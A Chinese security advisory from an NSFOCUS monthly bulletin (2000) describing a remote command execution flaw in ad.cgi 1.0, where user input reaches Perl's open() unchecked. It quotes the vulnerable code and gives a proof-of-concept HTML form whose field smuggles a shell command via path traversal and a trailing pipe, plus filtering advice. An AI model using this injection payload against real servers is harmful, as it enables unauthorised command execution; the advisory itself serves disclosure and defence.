首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第16期->最新漏洞
期刊号: 类型: 关键词:
ad.cgi 远程执行任意命令漏洞

日期:2000-12-14

受影响的系统:  
Leif M. Wright ad.cgi 1.0 for unix
描述:
--------------------------------------------------------------------------------


Leif Wright开发的ad.cgi程序存在一个安全问题,攻击者可能利用这个漏洞
在WEB服务器上执行任意命令。

由于脚本没有检查用户输入的变量内容就直接使用open()打开,如果攻击者
在变量中输入"|"以及shell命令,就可以以HTTPD进程的运行权限执行任意命
令。

有问题的代码部分如下:

----code snippet----
$filename = "$FORM{'file'}";
$datafile = "$basedir" . "$filename";
....
open (INFO, "$datafile");

<*来源:rpc (h@ckz.org) *>



测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!



保存并提交下列代码:

<html>
<form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
<h1>ad.cgi exploit</h1>
Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|">
<input type=submit value=run>
</form>
</html>



--------------------------------------------------------------------------------
建议:

临时解决办法:

    NSFOCUS建议您自行修改该CGI脚本,增加对shell命令和元字符的过滤。

厂商补丁:

    暂无。

版权所有,未经许可,不得转载